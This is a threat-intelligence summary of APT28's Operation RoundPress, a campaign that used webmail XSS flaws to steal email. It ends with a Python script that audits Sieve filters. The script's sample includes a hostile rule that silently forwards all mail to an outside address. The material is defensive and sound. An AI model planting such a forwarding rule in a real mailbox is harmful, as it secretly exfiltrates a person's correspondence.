Full Report
A Russia-linked threat actor has been attributed to a cyber espionage operation targeting webmail servers such as Roundcube, Horde, MDaemon, and Zimbra via cross-site scripting (XSS) vulnerabilities, including a then-zero-day in MDaemon, according to new findings from ESET. The activity, which commenced in 2023, has been codenamed Operation RoundPress by the Slovak cybersecurity company. It has
Analysis Summary
# Threat Actor: APT28 (Operation RoundPress)
## Attribution & Identity
The threat actor is attributed with **medium confidence** to the Russian state-sponsored hacking group **APT28**.
Known Aliases/Associated Groups: BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. The campaign itself is codenamed **Operation RoundPress**.
## Activity Summary
Operation RoundPress is a cyber espionage operation commencing in 2023, focused on exfiltrating confidential data from targeted email accounts. The activity involves exploiting Cross-Site Scripting (XSS) vulnerabilities in commercial webmail servers. Attribution to APT28 is based on overlapping email addresses used in spear-phishing and server configuration similarities. A key aspect of this operation included the exploitation of a then-zero-day vulnerability in MDaemon (CVE-2024-11182). The fundamental goal is email theft.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Exploitation of XSS vulnerabilities in webmail portals (Horde, MDaemon, Zimbra, Roundcube) via spear-phishing emails where the malicious code resides in the HTML body.
- **Execution:** Execution of arbitrary JavaScript code within the context of the webmail client’s browser window, requiring the victim to open the message in the vulnerable web portal.
- **Credential/Data Theft:** Execution of an obfuscated JavaScript payload named **SpyPress** to steal webmail credentials, harvest email messages, and steal contact information.
- **Persistence/Evasion (Roundcube Variant):** SpyPress.ROUNDCUBE variants can create **Sieve rules** to forward copies of all incoming emails indefinitely to an attacker-controlled address, ensuring persistence even if subsequent malicious scripts are blocked.
- **Access Maintenance (MDaemon Variant):** Certain variants can capture 2FA codes and create application passwords for MDaemon to maintain mailbox access post-compromise.
- **Exfiltration:** Gathering information via HTTP POST requests to a hard-coded Command-and-Control (C2) server.
- **Vulnerabilities Exploited:**
  - MDaemon XSS (used as a zero-day, later patched as **CVE-2024-11182**).
  - Roundcube (**CVE-2023-43770**, listed on CISA KEV).
  - Zimbra (**CVE-2024-27443**).
  - Horde (unspecified old flaw fixed in Horde Webmail 1.0 from 2007).
  - APT28 previously abused Roundcube flaws such as CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026.
## Targeting
- **Sectors:** Governmental entities, defense companies, military organizations, and academic organizations.
- **Geography:** Primary targets observed in **Eastern Europe** (specifically Ukrainian governmental entities and defense companies in Bulgaria and Romania, some producing Soviet-era weapons). Other targets include governments/entities in **Africa, Europe, and South America** (e.g., Greece, Cameroon, Ecuador, Serbia, and Cyprus).
- **Victims:** Specific organizations were not named beyond sector and geography, but they include entities related to defense supply chains for Ukraine.
## Tools & Infrastructure
- **Malware Families Used:** **SpyPress** (JavaScript payload), including variants like **SpyPress.ROUNDCUBE**.
- **Infrastructure (C2):** Exfiltration occurs via HTTP POST requests to a hard-coded C2 server (details not specified).
## Implications
APT28 continues to prioritize high-value, espionage-driven objectives, using external-facing services (webmail) as a preferred entry point. The group's willingness to use zero-day vulnerabilities (MDaemon XSS) demonstrates high operational sophistication and a focus on specific, high-impact targets. The use of Sieve rules is a significant tactic for ensuring persistent backdoor access to vital email communications even after automated defenses address the initial exploit. Given the targeting of defense contractors supplying Ukraine, this activity directly supports Russian geopolitical intelligence gathering.
## Mitigations
- **Patch Management:** Immediately patch all webmail servers (Roundcube, Zimbra, MDaemon, Horde) against known vulnerabilities (e.g., CVE-2023-43770, CVE-2024-27443, CVE-2024-11182) and ensure servers are running the latest versions, as many victims were running outdated, vulnerable software.
- **Email Security:** Enhance email gateway filtering to detect and quarantine emails containing complex, embedded HTML/scripting that may trigger XSS vulnerabilities, even if the visible email content appears benign.
- **User Training:** Implement rigorous training emphasizing that malicious code can execute simply by viewing an email in a webmail interface, and that users must be vigilant against unexpected emails.
- **Configuration Hardening:** Review webmail server configurations for overly permissive settings that might allow script execution or modification of server-side rules (like Sieve rules).
- **MFA/Password Rotation:** Due to the malware's ability to steal credentials and potentially 2FA codes or create application passwords, enforce strong Multi-Factor Authentication (MFA) and regularly cycle passwords if suspicious activity is noted.
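The Sieve-rule persistence described under Tactics, Techniques & Procedures is what the Configuration Hardening item above asks administrators to review for. The following added example (not ESET's code, nor part of any webmail product) audits a user's Sieve script for the shape that technique leaves behind: a `redirect` that is unconditional (outside any `if` block) or uses `:copy`, pointing at a domain outside the organisation. The sample script, the `example.net` collector address and the `ORG_DOMAINS` set are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample Sieve script (not taken from the report). The second
# rule silently copies every incoming message to an external address, which
# is the persistence pattern attributed to SpyPress.ROUNDCUBE above.
SAMPLE_SIEVE = """
# rule:[Vacation]
if header :contains "subject" "out of office" {
    fileinto "Archive";
}
# rule:[sync]
redirect :copy "collector@example.net";
keep;
"""

ORG_DOMAINS = {"example.org"}  # assumption: the organisation's own mail domains

# redirect [:copy] "address"  (tags such as :copy may precede the address)
REDIRECT_RE = re.compile(r'redirect\s+((?::\w+\s+)*)"([^"]+)"', re.IGNORECASE)


@dataclass
class Finding:
    address: str
    copies: bool          # ':copy' keeps the original in the mailbox, so the user sees nothing
    unconditional: bool   # not nested in an 'if' block: applies to every message
    external: bool        # destination domain is not one of ours


def strip_comments(script: str) -> str:
    # Sieve has '#' line comments and '/* */' block comments; drop both.
    script = re.sub(r'/\*.*?\*/', '', script, flags=re.S)
    return re.sub(r'#[^\n]*', '', script)


def audit_sieve(script: str, org_domains=ORG_DOMAINS) -> list[Finding]:
    text = strip_comments(script)
    findings = []
    for m in REDIRECT_RE.finditer(text):
        # Brace depth before the action tells us whether it sits inside an 'if'.
        depth = text.count('{', 0, m.start()) - text.count('}', 0, m.start())
        tags, addr = m.group(1).lower(), m.group(2)
        domain = addr.rpartition('@')[2].lower()
        findings.append(Finding(addr, ':copy' in tags, depth == 0, domain not in org_domains))
    return findings


def suspicious(findings: list[Finding]) -> list[Finding]:
    # Flag external forwards that apply to all mail or hide themselves via ':copy'.
    return [f for f in findings if f.external and (f.unconditional or f.copies)]


if __name__ == "__main__":
    for f in suspicious(audit_sieve(SAMPLE_SIEVE)):
        print(f"ALERT: forward-all rule to {f.address} (copy={f.copies}, unconditional={f.unconditional})")
```

In practice the script is read from each mailbox's managesieve store and the check is scheduled, so a rule added after the initial exploit is caught even when the XSS payload itself was blocked.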